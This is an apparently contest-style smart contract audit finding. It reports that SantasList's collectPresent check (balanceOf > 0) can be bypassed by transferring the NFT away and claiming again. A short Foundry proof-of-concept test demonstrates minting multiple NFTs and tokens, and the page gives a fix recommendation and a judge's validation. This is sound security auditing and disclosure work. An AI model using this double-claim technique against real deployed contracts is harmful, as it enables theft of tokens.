Beginner FriendlyFoundry
100 EXP
View results
Submission Details
Severity: high
Valid

Users can mint an unlimited number of tokens and NFTs

Summary

There are vulnerabilities in collectPresent that allow users to mint as many tokens and NFTs as they desire.

Vulnerability Details

The issue lies in the following code snippet within the collectPresent function:

if (balanceOf(msg.sender) > 0) {
revert SantasList__AlreadyCollected();
}

This approach to determine whether a user has already collected their reward is flawed. It allows users to transfer the NFT before calling the function again, enabling them to invoke collectPresent multiple times.

Impact

Users can exploit this vulnerability to mint an unlimited number of NFTs (And Tokens if he is EXTRA_NICE).

POC

function testTransferNFTAndMintAgain() external {
vm.startPrank(santa);
santasList.checkList(user, SantasList.Status.EXTRA_NICE);
santasList.checkTwice(user, SantasList.Status.EXTRA_NICE);
vm.stopPrank();
vm.warp(santasList.CHRISTMAS_2023_BLOCK_TIME() + 1);
vm.startPrank(user);
santasList.collectPresent();
santasList.transferFrom(user, user2, 0);
santasList.collectPresent();
santasList.transferFrom(user, user2, 1);
vm.stopPrank();
address ownerNFT0 = santasList.ownerOf(0);
address ownerNFT1 = santasList.ownerOf(1);
uint256 userBalance = santaToken.balanceOf(user);
assertEq(ownerNFT0, user2);
assertEq(ownerNFT1, user2);
assertEq(userBalance, 2e18);
}

Tools Used

Foundry

Recommendations

Store the user claiming the reward in a mapping to ensure that they can only collect the reward once.

Updates

Lead Judging Commences

inallhonesty Lead Judge over 1 year ago
Submission Judgement Published
Validated
Assigned finding tags:

Weak Already Collected Check

Relying on balanceOf > 0 in collectPresent() allows the msg.sender to send their present to another address and then collect again.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.